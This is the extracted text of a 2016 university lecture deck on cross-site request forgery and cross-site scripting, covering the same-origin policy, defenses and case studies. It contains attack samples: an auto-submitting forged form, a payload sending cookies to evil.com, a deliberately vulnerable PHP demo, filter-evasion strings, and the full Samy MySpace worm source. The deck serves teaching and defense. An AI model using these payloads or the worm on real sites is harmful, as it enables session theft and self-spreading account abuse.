cse 484 / cse m 584: computer security and privacy csrf and xss … · 2016-11-07 · all of these...

CSE484/CSEM584:ComputerSecurityandPrivacy

CSRFandXSSattacks

Fall2016

Ada(Adam)[email protected]

ThankstoFranziRoesner,DanBoneh,DieterGollmann,DanHalperin,YoshiKohno,JohnManferdelli,JohnMitchell,VitalyShmatikov,BennetYee,andmanyothersforsampleslidesandmaterials...

Network

WebSecurity!BigPicture:BrowserandNetwork

11/7/16 CSE484/CSEM584-Fall2016 2

Browser

OS

Hardware

websiterequest

reply

ThebrowserrendersorexecutesarbitraryHTML,CSS,andJavascriptsendbyhostsontheInternet.

WhereDoestheAttackerLive?

11/7/16 CSE484/CSEM584-Fall2016 3

Network

Browser

OS

Hardware

websiterequest

replyWeb

attacker

Networkattacker

Malwareattacker

AllofTheseShouldBeSafe

•  Safetovisitanevilwebsite

•  Safetovisittwopagesatthesametime

•  Safedelegation

11/7/16 CSE484/CSEM584-Fall2016 4

TwoSidesofWebSecurity

•  Webbrowser– ResponsibleforsecurelyconfiningWebcontentpresentedbyvisitedwebsites

•  Webapplications– Onlinemerchants,banks,blogs,GoogleApps…– Mixofserver-sideandclient-sidecode

•  Server-sidecodewritteninPHP,Ruby,ASP,JSP…runsontheWebserver

•  Client-sidecodewritteninJavaScript…runsintheWebbrowser

– Manypotentialbugs:XSS,XSRF,SQLinjection

11/7/16 CSE484/CSEM584-Fall2016 5

Javascript,or,SoftwareSecurityfortheWeb! <html> … <p> The script on this page is totally trustworthy <script>

doSomethingEvil() </script> … </html>

11/7/16 CSE484/CSEM584-Fall2016 6

Browserreceivescontent,displaysHTMLandexecutesscripts

Apotentiallymaliciouswebpagegetstoexecutesomecodeonuser’smachine!

www.attacker.com

AStrawpersonAttack

www.attacker.com

www.bank.com(e.g.,

balance:$500)

www.attacker.com(theparent)cannotaccessHTMLelementsin

theiframe(andviceversa).

11/7/16 CSE484/CSEM584-Fall2016 7

Same-OriginPolicy:DOM

OnlycodefromsameorigincanaccessHTMLelementsonanothersite(orinaniframe).

www.example.com

www.example.com/iframe.html

www.evil.com

www.example.com/iframe.html

www.example.com(theparent)canaccessHTMLelementsintheiframe

(andviceversa).

www.evil.com(theparent)cannotaccessHTMLelementsintheiframe

(andviceversa).11/7/16 CSE484/CSEM584-Fall2016 8

DOM:DocumentObjectModel

•  Hierarchicalinterface(e.g.,toJavascript)totheelementsofawebpage

<html> <meta> <body> <div> <img> <iframe> …

11/7/16 CSE484/CSEM584-Fall2016 9

DOM:DocumentObjectModel

11/7/16 CSE484/CSEM584-Fall2016 10

Same-OriginPolicy

Websiteorigin=(scheme,domain,port)

[ExamplethankstoWikipedia.]11/7/16 CSE484/CSEM584-Fall2016 11

Cross-OriginCommunication?

•  Websitescanembedscripts,images,etc.fromotherorigins.

•  Forexample,onexample.com…

<img src=“imgur.com/cat.png”> isallowed

<script src=“jquery.com/jquery.js”>

isallowed

11/7/16 CSE484/CSEM584-Fall2016 12

www.example.com

www.example.com



•  But:AJAXrequests(akaXMLHttpRequests)arenotallowedacrossorigins.

11/7/16 CSE484/CSEM584-Fall2016 13

Onexample.com:<script>var xhr = new XMLHttpRequest();xhr.onreadystatechange = handleStateChange; // Elsewhere xhr.open("GET", “https://bank.com/account_info”, true); xhr.send();</script>

AJAXrequests

•  RequestsmadeinJavascriptdynamicallyfordata(e.g.,togetnewemailsinawebmailclients

var image = get(http://www.imgur.com/cat.jpg)

11/7/16 CSE484/CSEM584-Fall2016 14



•  But:AJAXrequests(akaXMLHttpRequests)arenotallowedacrossorigins.

•  Whynot?•  Browserautomaticallyincludescookieswithrequests

(i.e.,usercredentialsaresent)•  Callercanreadreturneddata(clearSOPviolation)

11/7/16 CSE484/CSEM584-Fall2016 15

AllowingCross-OriginCommunication

•  Domainrelaxation–  Iftwoframeseachsetdocument.domaintothesamevalue,

thentheycancommunicate•  E.g.www.facebook.com,facebook.com,andchat.facebook.com•  Mustbeasuffixoftheactualdomain

•  Access-Control-Allow-Origin:<listofdomains>–  SpecifiesoneormoredomainsthatmayaccessDOM–  Typicalusage:Access-Control-Allow-Origin:*

•  HTML5postMessage–  Letsframessendmessagestoeachotherincontrolledfashion–  Unfortunately,manybugsinhowframeschecksender’sorigin

11/7/16 CSE484/CSEM584-Fall2016 16

WhataboutBrowserPlugins?

•  Examples:Flash,Silverlight,Java,PDFreader•  Goal:enablefunctionalitythatrequirestranscending

thebrowsersandbox•  Increasesbrowser’sattacksurface

•  Goodnews:pluginsandboxingimproving,andneedforpluginsdecreasing(duetoHTML5andextensions)

11/7/16 CSE484/CSEM584-Fall2016 17

WhataboutBrowserExtensions?

•  Mostthingsyouusetodayareprobablyextensions•  Examples:AdBlock,Ghostery,Mailvelope•  Goal:Extendthefunctionalityofthebrowser

•  (Chrome:)Carefullydesignedsecuritymodeltoprotectfrommaliciouswebsites–  Privilegeseparation:extensionsconsistofmultiple

componentswithwell-definedcommunication–  Leastprivilege:extensionsrequestpermissions

11/7/16 CSE484/CSEM584-Fall2016 18

WhataboutBrowserExtensions?

•  Butbewaryofmaliciousextensions:notsubjecttothesame-originpolicy–caninjectcodeintoanywebpage!

11/7/16 CSE484/CSEM584-Fall2016 19

WebApplications

•  Bigtrend:softwareasaWeb-basedservice–  Onlinebanking,shopping,government,billpayment,tax

prep,customerrelationshipmanagement,etc.–  Cloudcomputing

•  ApplicationshostedonWebservers– WritteninamixtureofPHP,Ruby,Java,Perl,ASP

•  Securityisrarelythemainconcern–  Poorlywrittenscriptswithinadequateinputvalidation–  Sensitivedatastoredinworld-readablefiles

11/7/16 CSE484/CSEM584-Fall2016 20

DynamicWebApplication

11/7/16 CSE484/CSEM584-Fall2016 21

Browser

Webserver

GET/HTTP/1.1

HTTP/1.1200OK

index.php

Databaseserver

OWASPTop10WebVulnerabilities

1.  Injection2.  BrokenAuthentication&SessionManagement3.  Cross-SiteScripting4.  InsecureDirectObjectReferences5.  SecurityMisconfiguration6.  SensitiveDataExposure7.  MissingFunctionLevelAccessControl8.  Cross-SiteRequestForgery9.  UsingKnownVulnerableComponents10.  UnvalidatedRedirectsandForwards

11/7/16 CSE484/CSEM584-Fall2016 22

http://www.owasp.org

Cross-SiteRequestForgery(CSRF/XSRF)

11/7/16 CSE484/CSEM584-Fall2016 23

“ConfusedDeputy”

•  ThebrowserisdeputizedtoactasAlice–itsendsAlice’scookieswithherrequeststobank.com

•  Attackerscancausethebrowsertomakemaliciousrequeststobank.com,whichitwillperformautomaticallyusingAlice’scookies!

11/7/16 CSE484/CSEM584-Fall2016 24

Cookie-BasedAuthenticationRedux

11/7/16 CSE484/CSEM584-Fall2016 25

ServerBrowserPOST/login.cgi

Set-cookie:authenticator

GET…Cookie:authenticator

response

BrowserSandboxRedux

•  Basedonthesameoriginpolicy(SOP)•  Activecontent(scripts)cansendanywhere!–  Forexample,cansubmitaPOSTrequest–  Someportsinaccessible--e.g.,SMTP(email)

•  Canonlyreadresponsefromthesameorigin– …butyoucandoalotwithjustsending!

11/7/16 CSE484/CSEM584-Fall2016 26

Cross-SiteRequestForgery

•  Userslogsintobank.com,forgetstosignoff–  Sessioncookieremainsinbrowserstate

•  Userthenvisitsamaliciouswebsitecontaining <form name=BillPayForm action=http://bank.com/BillPay.php> <input name=recipient value=badguy> …

<script> document.BillPayForm.submit(); </script>•  Browsersendscookie,paymentrequestfulfilled!•  Lesson:cookieauthenticationisnotsufficient

whensideeffectscanhappen

11/7/16 CSE484/CSEM584-Fall2016 27

CookiesinForgedRequests

11/7/16 CSE484/CSEM584-Fall2016 28

Usercredentialsautomaticallysentbybrowser

Cookie:SessionID=523FA4cd2E

SendingaCross-DomainPOST<form method="POST" action=http://othersite.com/action >...</form><script>document.forms[0].submit()</script>

•  Hiddeniframecandothisinthebackground•  Uservisitsamaliciouspage,browsersubmitsformonbehalfoftheuser– Hijackanyongoingsession(ifnoprotection)

•  Netflix:changeaccountsettings,Gmail:stealcontacts,Amazon:one-clickpurchase

– Reprogramtheuser’shomerouter– Manyotherattackspossible

11/7/16 CSE484/CSEM584-Fall2016 29

submitpost

XSRF(akaCSRF):Summary

11/7/16 CSE484/CSEM584-Fall2016 30

Attackserver

Servervictim

Uservictim

establishsessio

n

sendforgedre

quest

visitserverreceivemaliciouspage

1

2

3

4

Q:howlongdoyoustayloggedontoGmail?Financialsites?

CSRFTrueStory

11/7/16 CSE484/CSEM584-Fall2016 31

[AlexStamos]

Internet Exploder

CyberVillians.com

StockBroker.com

ticker.stockbroker.comJava

GET news.html

HTML and JSwww.cybervillians.com/news.html

B er nank eR ea l l yan A l i en ?

scriptHTML Form POSTs

Hiddeniframessubmittedformsthat…•  Changeduser’semailnotificationsettings•  Linkedanewcheckingaccount•  Transferredout$5,000•  Unlinkedtheaccount•  Restoredemailnotifications

BroaderViewofCSRF

•  Abuseofcross-sitedataexport– SOPdoesnotcontroldataexport– Maliciouswebpagecaninitiatesrequestsfromtheuser’sbrowsertoanhonestserver

– Serverthinksrequestsarepartoftheestablishedsessionbetweenthebrowserandtheserver(automaticallysendscookies)

11/7/16 CSE484/CSEM584-Fall2016 32

LoginCSRF:Attackerlogsyouinasthem!

11/7/16 CSE484/CSEM584-Fall2016 33

Userloggedinasattacker

Attacker’saccountreflectsuser’sbehavior

CSRFDefenses

11/7/16 CSE484/CSEM584-Fall2016 34

CSRFDefenses

11/7/16 CSE484/CSEM584-Fall2016 35

•  Secretvalidationtoken

•  Referervalidation

<inputtype=hiddenvalue=23a3af01b>

Referer:http://www.facebook.com/home.php

AddSecretTokentoForms

•  “SynchronizerTokenPattern”•  Includeasecretchallengetokenasahiddeninput

informs–  Tokenoftenbasedonuser’ssessionID–  Servermustverifycorrectnessoftokenbefore

executingsensitiveoperations

•  Whydoesthiswork?–  Same-originpolicy:attackercan’treadtokenoutof

legitimateformsloadedinuser’sbrowser,socan’tcreatefakeformswithcorrecttoken

11/7/16 CSE484/CSEM584-Fall2016 36

<inputtype=hiddenvalue=23a3af01b>

RefererValidation

11/7/16 CSE484/CSEM584-Fall2016 37

•  Lenientrefererchecking–headerisoptional•  Strictrefererchecking–headerisrequired

Referer:http://www.facebook.com/home.php

Referer:http://www.evil.com/attack.html

Referer:

üû?

WhyNotAlwaysStrictChecking?

•  Whymighttherefererheaderbesuppressed?–  Strippedbytheorganization’snetworkfilter

•  Forexample,http://intranet.corp.apple.com/projects/iphone/competitors.html

–  Strippedbythelocalmachine–  StrippedbythebrowserforHTTPS→HTTPtransitions–  Userpreferenceinbrowser–  Buggybrowser

•  Webapplicationscan’taffordtoblocktheseusers•  RefererrarelysuppressedoverHTTPS–  LoginstypicallyuseHTTPS–helpsagainstloginXSRF!

11/7/16 CSE484/CSEM584-Fall2016 38

Cross-SiteScripting(XSS)

11/7/16 CSE484/CSEM584-Fall2016 39

XSS

•  Ihaveafriendwithareallyhardtopronouncename.

11/7/16 CSE484/CSEM584-Fall2016 40

Hernameis“<img src=‘http://upload.wikimedia.org/wikipedia/en/thumb/3/39/YoshiMarioParty9.png/210px-YoshiMarioParty9.png’>”!

XSS

•  XSSisabouttheproblemsthatarisewhenyouhaveanamethathappenstobeaURL.

11/7/16 CSE484/CSEM584-Fall2016 41

PHP:HypertextProcessor

•  ServerscriptinglanguagewithC-likesyntax

11/7/16 CSE484/CSEM584-Fall2016 42


•  CaninterminglestaticHTMLandcode <input value=<?php echo $myvalue; ?>>

11/7/16 CSE484/CSEM584-Fall2016 43


•  CaninterminglestaticHTMLandcode <input value=<?php echo $myvalue; ?>>•  Canembedvariablesindouble-quotestrings$user = “world”; echo “Hello $user!”;or $user = “world”; echo “Hello” . $user . “!”;

11/7/16 CSE484/CSEM584-Fall2016 44


•  CaninterminglestaticHTMLandcode <input value=<?php echo $myvalue; ?>>•  Canembedvariablesindouble-quotestrings$user = “world”; echo “Hello $user!”;or $user = “world”; echo “Hello” . $user . “!”;

•  Formdatainglobalarrays$_GET,$_POST,…

11/7/16 CSE484/CSEM584-Fall2016 45

Echoing/“Reflecting”UserInputClassicmistakeinserver-sideapplicationshttp://naive.com/search.php?term=“JustinBieber”search.phprespondswith<html> <title>Search results</title><body>You have searched for <?php echo $_GET[term] ?>… </body>OrGET/hello.cgi?name=Bobhello.cgirespondswith<html>Welcome, dear Bob</html>

11/7/16 CSE484/CSEM584-Fall2016 46

Echoing/“Reflecting”UserInput

11/7/16 CSE484/CSEM584-Fall2016 47

naive.com/hello.cgi?name=Bob!

Welcome,dearBob

naive.com/hello.cgi?name=<img src=‘http://upload.wikimedia.org/wikipedia/en/thumb/3/39/YoshiMarioParty9.png/210px-YoshiMarioParty9.png’>!

Welcome,dear

Cross-SiteScripting(XSS)

11/7/16 CSE484/CSEM584-Fall2016 48

victim’sbrowser

naive.comevil.com

Accesssomewebpage

<iframesrc=http://naive.com/hello.cgi?name=<script>win.open(“http://evil.com/steal.cgi?cookie=”+document.cookie)</script>>

Forcesvictim’sbrowsertocallhello.cgionnaive.comwiththisscriptas“name”

GET/hello.cgi?name=<script>win.open(“http://evil.com/steal.cgi?cookie=”+document.cookie)</script> hello.cgi

executed

<HTML>Hello,dear<script>win.open(“http://evil.com/steal.cgi?cookie=”+document.cookie)</script>Welcome!</HTML>

InterpretedasJavaScriptbyvictim’sbrowser;openswindowandcallssteal.cgionevil.com

GET/steal.cgi?cookie=

hello.cgi

XSS–QuickDemo<?phpsetcookie("SECRET_COOKIE", "12345");header("X-XSS-Protection: 0");?><html><body><br><br><form action="vulnerable.php" method="get">Name: <input type="text" name="name" size="80"><input type="submit" value="submit”></form><br><br><br><div id="greeting"><?php$name = $_GET["name"]; if($name) { echo "Welcome " . $_GET['name'];}?></div></body></html>

11/7/16 CSE484/CSEM584-Fall2016 49

NeedtoexplicitlydisableXSSprotection–newerbrowserstrytohelpwebdevelopersavoidthesevulnerabilities!

ReflectedXSS

•  Useristrickedintovisitinganhonestwebsite–  Phishingemail,linkinabannerad,commentinablog

•  Buginwebsitecodecausesittoechototheuser’sbrowseranarbitraryattackscript–  Theoriginofthisscriptisnowthewebsiteitself!

•  Scriptcanmanipulatewebsitecontents(DOM)toshowbogusinformation,requestsensitivedata,controlformfieldsonthispageandlinkedpages,causeuser’sbrowsertoattackotherwebsites–  Thisviolatesthe“spirit”ofthesameoriginpolicy

11/7/16 CSE484/CSEM584-Fall2016 50

BasicPatternforReflectedXSS

11/7/16 CSE484/CSEM584-Fall2016 51

Attackserver

ServervictimUservictim

visitwebsite

receivemalicious

page

clickonlinkechouserinput

1

2

3

sendvaluabled

ata

5

4

WhereMaliciousScriptsLurk

•  User-createdcontent– Socialsites,blogs,forums,wikis

•  Whenvisitorloadsthepage,websitedisplaysthecontentandvisitor’sbrowserexecutesthescript– Manysitestrytofilteroutscriptsfromusercontent,butthisisdifficult!

11/7/16 CSE484/CSEM584-Fall2016 52

StoredXSS

11/7/16 CSE484/CSEM584-Fall2016 53

Attackserver

Servervictim

Uservictim

Injectmaliciousscriptrequestcontent

receivemaliciousscript

1

23

stealvaluabled

ata

4

Storebadstuff

Usersviewordownloadcontent

TwitterWorm(2009)

•  CansaveURL-encodeddataintoTwitterprofile•  Datanotescapedwhenprofileisdisplayed•  Result:StalkDailyXSSexploit–  Ifviewaninfectedprofile,scriptinfectsyourownprofile

var update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! "); var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

var ajaxConn = new XHConn(); ajaxConn.connect(“/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update"); ajaxConn1.connect(“/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update”)

11/7/16 CSE484/CSEM584-Fall2016 54

http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/

PreventingCross-SiteScripting

•  Anyuserinputandclient-sidedatamustbepreprocessedbeforeitisusedinsideHTML

•  Remove/encodeHTMLspecialcharacters– Useagoodescapinglibrary

•  OWASPESAPI(EnterpriseSecurityAPI)•  Microsoft’sAntiXSS

–  InPHP,htmlspecialchars(string)willreplaceallspecialcharacterswiththeirHTMLcodes•  ‘becomes'“becomes"&becomes&

–  InASP.NET,Server.HtmlEncode(string)

11/7/16 CSE484/CSEM584-Fall2016 55

EvadingXSSFilters

•  PreventinginjectionofscriptsintoHTMLishard!–  Blocking“<”and“>”isnotenough–  Eventhandlers,stylesheets,encodedinputs(%3C),etc.–  phpBBallowedsimpleHTMLtagslike<b>

<bc=“>” onmouseover=“script”x=“<b”>Hello<b>•  Bewareoffilterevasiontricks(XSSCheatSheet)–  Iffilterallowsquoting(of<script>,etc.),bewareof

malformedquoting:<IMG"""><SCRIPT>alert("XSS")</SCRIPT>">–  LongUTF-8encoding–  Scriptsarenotonlyin<script>:<iframesrc=‘https://bank.com/login’onload=‘steal()’>

11/7/16 CSE484/CSEM584-Fall2016 56

MySpaceWorm(1)

•  UserscanpostHTMLontheirMySpacepages•  MySpacedoesnotallowscriptsinusers’HTML– No<script>,<body>,onclick,<ahref=javascript://>

•  …butdoesallow<div>tagsforCSS.–  <divstyle=“background:url(‘javascript:alert(1)’)”>

•  ButMySpacewillstripout“javascript”– Use“java<NEWLINE>script”instead

•  ButMySpacewillstripoutquotes–  Convertfromdecimalinstead:alert('doublequote:'+String.fromCharCode(34))

11/7/16 CSE484/CSEM584-Fall2016 57

http://namb.la/popular/tech.html

MySpaceWorm(2)Resultingcode:

<div id=mycode style="BACKGROUND: url('java �script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>


11/7/16 CSE484/CSEM584-Fall2016 58

MySpaceWorm(3)•  “Therewereafewothercomplicationsandthingstogetaround.Thiswasnotbyanymeansastraightforwardprocess,andnoneofthiswasmeanttocauseanydamageorpissanyoneoff.Thiswasintheinterestof..interest.Itwasinterestingandfun!”

•  Startedon“samy”MySpacepage•  Everybodywhovisitsaninfectedpage,becomes

infectedandadds“samy”asafriendandhero•  5hourslater“samy”has1,005,831friends

–  Wasadding1,000friendspersecondatitspeak

11/7/16 CSE484/CSEM584-Fall2016 59


cse 484 / cse m 584: computer security and privacy csrf and xss … · 2016-11-07 · all of these...

Documents